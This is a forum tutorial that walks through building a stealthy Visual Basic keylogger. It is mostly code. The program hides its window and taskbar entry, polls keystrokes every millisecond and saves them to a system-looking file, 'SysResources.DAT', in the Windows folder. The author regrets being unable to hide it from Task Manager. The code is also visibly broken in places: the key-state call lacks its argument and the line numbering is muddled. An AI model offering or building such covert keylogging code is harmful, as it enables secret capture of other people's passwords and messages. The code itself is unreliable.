Make ur own keylogger

Make your own Keylogger

by SkZ

Well this might be usefull for some of you, depending on your Persona of keyloggers. You say you want to make your own, or interested on how to go about doing so, let me give you hand.. I will show you how .

Ok...I am assuming that you have a basic understanding as to how visual basic works and how to make programs, debug, and compile.

Ok. Open VB and start a new application. Add to the form a button, a timer, and a module(I know the module isn't actually part of the form). Thats all. Change there caption of the button to Start Logging
(if you want to make it start on me or email me)
Now using api guide or just copying from here, declare a new function. the GetASyncKeyState function.

1: Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState"
2: (ByVal vKey As Long) As Integer
^---put this in the declarations section of the module.

That is all one line of code. Make sure its like that. and not split in 2.

Now you have a new function to use through your program.
Now we must make it be "invisible". Now im sorry but in Windows XP, I do not know how to remove it from the "processes" section of the Task Manager. But Other than that...its invisible.

OK. In the button code..., in the click event of course...
type the following

1: app.taskvisible = false
2:form1.visible = false
4:timer1.enabled = true
'and also in the properties section of the form...change the shownintaskbar to false

Now when we click the goes invisible.

Now we are going to need some variables....
Back in the declarations section declare the following...

1: Dim strLetter as String, strTotal as String
Now in the timer code put this. Ill explain afterward.
also set the interval to 1 and enabled to false

1: Private Sub Timer1_Timer()
3:For I = 28 To 128
4:If GetAsyncKeyState <> 0 Then
6:strLetter = Chr(I)
10:'Now here you can add certain things
11:'so that instead of displaying
12:'retarded characters, it tells you
13:'what the user pressed. What I mean
14:'is if they press Enter/Return, it will
15:'Show some weird box. You dont want that
16:'so u make a select case about I for each
17:'button u want to customize. PM me or Email
18:'me for help on this part.
21:strTotal = strTotal & strLetter
24:End If
26:Next I
28: open "C:\Windows\SysResources.DAT" for output as #1
29:Print #1, strTotal
30:close #1
32:End Sub
35:'End Code
Now all you have to do is when you want to check the keys pressed, open up C:\Windows\SysResource.DAT in notepad, and there it is.

Ahh, hope you all are keeping up with me so far .. ... One last thing for all the noobies out there, here's it is in lamen terms.

2: Dim strLetter As String, strTotal As String, old as string
3:Private Sub Command1_Click()
4:Timer1.Enabled = True
5:End Sub
6:Private Sub Form_Load()
7:Command1.Caption = "Start Loggin"
8:Timer1.Enabled = False
9:Timer1.Interval = 1
10:End Sub
11:Private Sub Timer1_Timer()
12:For I = 28 To 128 'ASCII code
13:If GetAsyncKeyState <> 0 Then
13:strLetter = Chr(I)
14:End If
15:If strletter <> Old Then
16:Old = strletter
17:strTotal = strTotal & old
18:End If
19:Next I
20:Open "C:\windows\SysResources.dat" For Output As #1
21:Print #1, strTotal
22:Close #1
23:End Sub
I think thats it besides the Module of course.

NOTE: Well there it is I hope you all enjoy. ...

PSS:Now we must make it be "invisible". Now im sorry but in Windows XP, I do not know how to remove it from the "processes" section of the Task Manager. But Other than that...its invisible.


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